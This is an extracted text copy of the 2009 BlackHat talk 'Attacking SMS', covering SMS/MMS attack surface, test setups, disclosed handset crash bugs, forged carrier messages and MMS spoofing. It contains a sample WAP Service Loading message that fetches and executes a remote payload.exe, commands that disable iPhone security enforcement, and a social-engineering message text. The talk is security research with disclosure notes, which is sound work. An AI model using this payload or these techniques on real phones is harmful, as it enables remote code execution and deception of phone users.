Attacking SMS

Attacking SMS
BlackHat USA 2009
Zane Lackey (zane@isecpartners.com)
Luis Miras (luis@ringzero.net)
RingZero
https://luis.ringzero.net
Agenda
SMS Background
Overview SMS in mobile security
Testing Challenges Attack Environment Attacks

Implementation Configuration Architecture
Conclusion
RingZero
SMS Background
Were discussing SMS in the GSM world
SMS is a catch-all term
SMS MMS EMS
Functions as a store-and-forward system

Passed between carriers differently
Often converted to multiple formats along the way
RingZero
SMS Flow Intra-carrier
RingZero
SMS Flow Inter-carrier
RingZero
MMS Flow
RingZero
Why is SMS important to mobile security

Mobile phone messaging is unique attack surface
Always on
Functionality becoming more feature rich

Ringtones Videos Pictures
Technical hurdles for attackers are dropping

Easily modified phones
iPhone Android
Functionality at higher layers

Lower layers will be attackable soon
RingZero
Network Protocols Comparison
RingZero
User Data Header
RingZero
SMS UDH Background

Allows for new functionality to be built on top of SMS
MMS Ringtones Large/multipart messages
Also allows for new set of attacks

Is above the SMS header layer Can easily be pushed on to carrier network
RingZero
SMS UDH Example

Concatenated:
Port addressing (WAP):
RingZero
Testing Environment
RingZero
Testing Setup
Sending messages
Access to GSM modem
Encoding/Decoding messages
PDUs MSISDNs WBXML
Receiving messages
Determining what was actually received
RingZero
Sending messages
AT interface
GSM modems support AT commands
AT+CMGS, AT+CMGW, etc
Different devices and chipsets vary in supported features Terminal needed, HyperTerminal, Minicom, PySerial
Can sometimes access GSM modem in phone

Either via serial cable or Bluetooth Tends to be easier on feature phones
Modems vary in message support

GSM chip is at the heart of the modem. GSM chip documentation requires NDAs Treating chip as black box
RingZero
Encoding/Decoding messages
Encode/Decode SMS
PDUSpy http://www.nobbi.com/pduspy.htm By hand
WBXML
libwbxml converts between XML and WBXML http://libwbxml.aymerick.com/ wbxml2xml.exe converts WBXML to XML xml2wbxml.exe converts XML to WBXML Python bindings available
RingZero
Receiving messages
Many phones drop or alter messages
By the time a user sees the message through the phones UI, the phone has already potentially modified In the case of special messages (ex: concatenated), the user wont see the message until all parts arrive This hides too much data from a tester, need to see the raw message that arrives from the carrier
To obtain access to raw incoming PDU, it is best to use modems or older phones with extremely limited functionality
New phones store messages in phone memory Old phones will write raw PDU directly to SIM
SIM can then be removed from phone and analyzed

Weve modified a tool, pySimReader, to allow easy viewing of raw PDUs
RingZero
Attack Environment
RingZero
Attack environment goals

Increase speed
Requiring the carrier to deliver each message is slow
Reduce Cost
$0.10-$0.50 per message gets expensive when youre fuzzing thousands of messages
Add ability to analyze issues

Debugging, viewing logs, etc Sniffing traffic
RingZero
Virtual MMS Configuration

Originally used by Collin Mulliner
Virtual MMSC with Kannel and Apache
Apache needs a new mime type

application/vnd.wap.mms-message mms
Currently only Windows Mobile allows complete Virtual MMS environment over WIFI
Needs new MMS server configuration WM 6.x needs registry key changes
HKEY_LOCAL_MACHINE\Comm\Cellular\WAP\WAPImpl\SMSOnlyPorts
RingZero
MMS Attack Vectors

Message Headers
MMS uses many types of messages SMS, WAP, WSP
Message contents
SMIL
Markup language to describe content
Rich content
Images Audio/Video
RingZero
Windows Mobile Challenges

IDA Pro is the best debugger
Problems connecting and attaching in both IDA Pro and ActiveSync
IDA 5.5 wince debugger fixes some problems
General Debugger problems

ActiveSync is terrible ActiveSync connection disables the cellular data connection
System binaries cannot be stepped into.

XIP binaries cannot be copied off the device by default Tools available to dump files or firmware images
dumprom by itsme Extract_XIP on xda-developers.com
RingZero
iPhone 2.x Challenges

No native MMS
GDB has broken features
Apple maintains their own GCC and GDB ports GDB based on a 2005 release
GDB server is broken Many timers within CommCenter

Expired timeouts while debugging results in CommCenter restarting
RingZero
iPhone 3.0 beta Challenges

MMS possible using modified carrier files
Same GDB issues as 2.x
By default breakpoints in CommCenter would crash process

Adding debugging entitlements failed
CommCenter workaround
Attach to CommCenter Turn off all security
sysctl -w security.mac.proc_enforce=0 sysctl -w security.mac.vnode_enforce=0
Set breakpoints Turn on security (sometimes needed)
RingZero
Attacks
RingZero
Implementation Vulnerability
Android flaw in parsing UDH for concatenated messages
Concatenated messages have a sequence number. Valid range is 01-FF.
Setting sequence to 00 triggers an unhandled invalid array exception.
Impact: Crashed com.android.phone process on Android G1

Disables all radio activity on the phone. Unable to:
Make/Receive phone calls Send/Receive SMS
Privately disclosed to Google in March, fixed in Android cupcake release
RingZero
Additional Implementation Vulnerability

SwirlyMMS Notification From field denial of service
SwirlyMMS is 3rd party iPhone app to support MMS Bug in SwirlyMMS < 2.1.4
Impact: Crashes CommCenter process indefinitely

Disables all radio activity on the phone. Unable to:
Make/Receive phone calls Send/Receive SMS
Need to remove SIM and download corrupt message to another phone
Reported to SwirlySpace
Thanks to Tommy and Mats!
RingZero
Configuration vulnerability
Who is responsible?
Much different from normal software vulnerabilities OEMs, OS vendors, carriers all play a role in product
Windows Mobile WAP push SL vulnerability

Posted by c0rnholio on xda-developers.com http://forum.xda-developers.com/showthread.php?t=395389 Executes binary without notifying the user Not a Microsoft issue!
RingZero
Configuration vulnerability
Microsoft recommends strict permissions for WAPSL
Do not put SECROLE_USER_UNAUTH security role in Service Loading (SL) Message Policy. In practice, many phones allow SECROLE_USER_UNAUTH WAP SL messages This means unauthenticated users executing binaries on phones. HKLM\Security\Policies\Policies (recommended values)
0x0000100c : 0x800 0x0000100d : 0xc00
Example WAP SL WXML

<?xml version="1.0"?> <!DOCTYPE sl PUBLIC "-//WAPFORUM//DTD SL 1.0//EN" "http://www.wapforum.org/DTD/sl.dtd"> <sl href="http://example.com/payload.exe" action="execute-low" ></sl>
RingZero
Architecture Attacks
Lots of behind-the-scenes administrative messages are sent from the carrier to the phone
These messages can be forged by attackers

No source checking or cryptographic protections on messages
If an attacker constructs a validly formatted message, phones usually interpret it accordingly Benign example: voicemail notifications
RingZero
Youve got (lots of fake) mail!
RingZero
Carrier Administrative Functionality OTA Settings

A far more damaging example: OTA Settings
OTA (Over The Air) Settings are used by carrier to push new settings to a phone Will prompt users, but easily combined with social engineering attacks
This is a free message from your carrier. Were rolling out new settings to our customers to enhance their mobile experience. Please accept these new settings when they appear on your phone in the next several minutes.
RingZero
OTA Settings Legitimate?
RingZero
MMS Architecture Attacks
RingZero
RingZero
RingZero
RingZero
What is the content being retrieved?

Binary file containing
Header information SMIL markup Graphical/text content of message
RingZero
MMS Headers
Attackers have full control of these fields!
RingZero
MMS Architecture Attacks - Impact
Bypassing Source Number Spoofing Protections

Interestingly, the source doesnt even have to be a number
More on this in the demo
Carrier Anti-virus/Malware/Spam Checking Evasion

Can only be performed when content is hosted on carrier servers
RingZero
Fingerprinting via MMS

Notifications can also be used for fingerprinting mobile phones
Most mobile phones automatically connect to the specified URL
Even if they dont necessarily download the MMS file
Fingerprint via User Agent:

"SonyEricssonW810i/R4EA UP.Link/6.3.1.20.0 "NokiaN95-3/20.2.011; Series60/3.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.20.06.3.1.20.0
Fingerprint Via HTTP headers:

x-wap-profile: "http://wap.sonyericsson.com/UAprof/W810iR301.xml"
RingZero
Presenting
RingZero
T.A.F.T.
RingZero
T.A.F.T. ?!
RingZero
RingZero
* Thanks to Brad Hill and Jason Snell
RingZero
About T.A.F.T.
Jailbroken iPhone application
Allows user the launch the attacks we have discussed in this presentation
Supports some of the attacks weve discussed in this presentation

Implementation + Configuration flaws VM Notification and Settings
MMS PoC functionality interacts with web application

Automatically generates binary MMS file with appropriate headers
RingZero
T.A.F.T. Architecture
RingZero
RingZero
RingZero
RingZero
RingZero
RingZero
T.A.F.T Screenshots
RingZero
DEMO
RingZero
Do Not Try That At Home

Architectural issue, so its not a quick patch to block
Will likely be exploitable for some time to come Responsibly disclosed to carrier we tested
Lack of patch doesnt mean carriers are defenseless

They can monitor for it and take action against subscribers Spoiler alert: Weve been told they are monitoring. They will take action.
Many GSM networks are likely affected

Were working with the GSM Alliance to find and notify all GSM carriers
Weve removed MMS/Fingerprinting functionality from TAFT

Due to agreement with carrier
RingZero
Obtaining TAFT
Updates: http://www.twitter.com/taftapp
Email: taftapp@gmail.com
Releasing via Cydia on 8/15

We ran into a serious bug that causes erratic sending times ranging from 10 seconds to 10 minutes. Testing a possible fix
RingZero
Conclusions
RingZero
Conclusions
Many carrier-only messages can be sent by attackers
MMS Spoofing, OTA Settings, Voicemail are just the start of this vulnerability class
OS Vendor/Carrier/OEM interaction can cause insecurity

Absolutely never enable this settings turns into remote code execution
RingZero
Future Thoughts
SMS easier and easier to attack
Attacks were likely to see soon:

Lots more handset implementation flaws Additional Provisioning / Administrative functionality New attacks against carrier only messages
RingZero
Q&A
RingZero
Thank you!
luis@ringzero.net
http://luis.ringzero.net
zane@isecpartners.com
http://www.isecpartners.com
RingZero
Want a copy of the presentation/tool?
Email iSEC at blackhat@isecpartners.com Instantly receive all iSEC presentations and tools
RingZero
References
RingZero
Tools
PySIM aka PySimReader
Written by Todd Whiteman: http://simreader.sourceforge.net/ Originally designed as a simple tool to read and write phonebook and SMS entries from a SIM card Weve added the ability to use the tool to write arbitrary raw PDU strings to a SIM card for testing Also added verbose debugging output so you can see the raw PDUs that are stored on the SIM Our modified code available at: http://www.isecpartners.com/tools.html
RingZero
Tools
SIM writer
ACS ACR38t USB, PC/SC compliant, supported by everything we tried it out on ~$30 @ http://www.txsystems.com/acs.html
RingZero
Further Information
SMS Information:
http://www.3gpp.org/ftp/Specs/html-info/0340.htm http://www.dreamfabric.com/sms/ http://www.developershome.com/sms/ http://www.activexperts.com/activsms/sms/ http://mobileforensics.files.wordpress.com/2007/06/understanding_sms.pdf
Prior Research:
http://www.mulliner.org/pocketpc/feed/CollinMulliner_syscan07_pocketpcmms.pd f http://www.cs.ucdavis.edu/~hchen/paper/securecomm06.pdf http://www.blackhat.com/presentations/bh-europe-01/job-de-haas/bh-europe-01dehaas.ppt
RingZero

Attacking SMS

Uploaded by

Copyright:

Available Formats

Attacking SMS

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Attacking SMS

Uploaded by

Copyright:

Available Formats

Attacking SMS

BlackHat USA 2009

Zane Lackey (zane@isecpartners.com)

Luis Miras (luis@ringzero.net)

Testing Challenges Attack Environment Attacks

Functions as a store-and-forward system

SMS Flow Intra-carrier

SMS Flow Inter-carrier

Why is SMS important to mobile security

Functionality becoming more feature rich

Technical hurdles for attackers are dropping

Functionality at higher layers

Network Protocols Comparison

User Data Header

SMS UDH Background

Also allows for new set of attacks

SMS UDH Example

Port addressing (WAP):

Can sometimes access GSM modem in phone

Modems vary in message support

SIM can then be removed from phone and analyzed

Attack environment goals

Add ability to analyze issues

Virtual MMS Configuration

Apache needs a new mime type

MMS Attack Vectors

Windows Mobile Challenges

General Debugger problems

System binaries cannot be stepped into.

iPhone 2.x Challenges

GDB server is broken Many timers within CommCenter

iPhone 3.0 beta Challenges

By default breakpoints in CommCenter would crash process

Set breakpoints Turn on security (sometimes needed)

Impact: Crashed com.android.phone process on Android G1

Privately disclosed to Google in March, fixed in Android cupcake release

Additional Implementation Vulnerability

Impact: Crashes CommCenter process indefinitely

Need to remove SIM and download corrupt message to another phone

Windows Mobile WAP push SL vulnerability

Example WAP SL WXML

These messages can be forged by attackers

Youve got (lots of fake) mail!

Carrier Administrative Functionality OTA Settings

OTA Settings Legitimate?

MMS Architecture Attacks

MMS Architecture Attacks

MMS Architecture Attacks

MMS Architecture Attacks

What is the content being retrieved?

Attackers have full control of these fields!

MMS Architecture Attacks - Impact

Bypassing Source Number Spoofing Protections

Carrier Anti-virus/Malware/Spam Checking Evasion

Fingerprinting via MMS

Fingerprint via User Agent:

Fingerprint Via HTTP headers:

* Thanks to Brad Hill and Jason Snell

Supports some of the attacks weve discussed in this presentation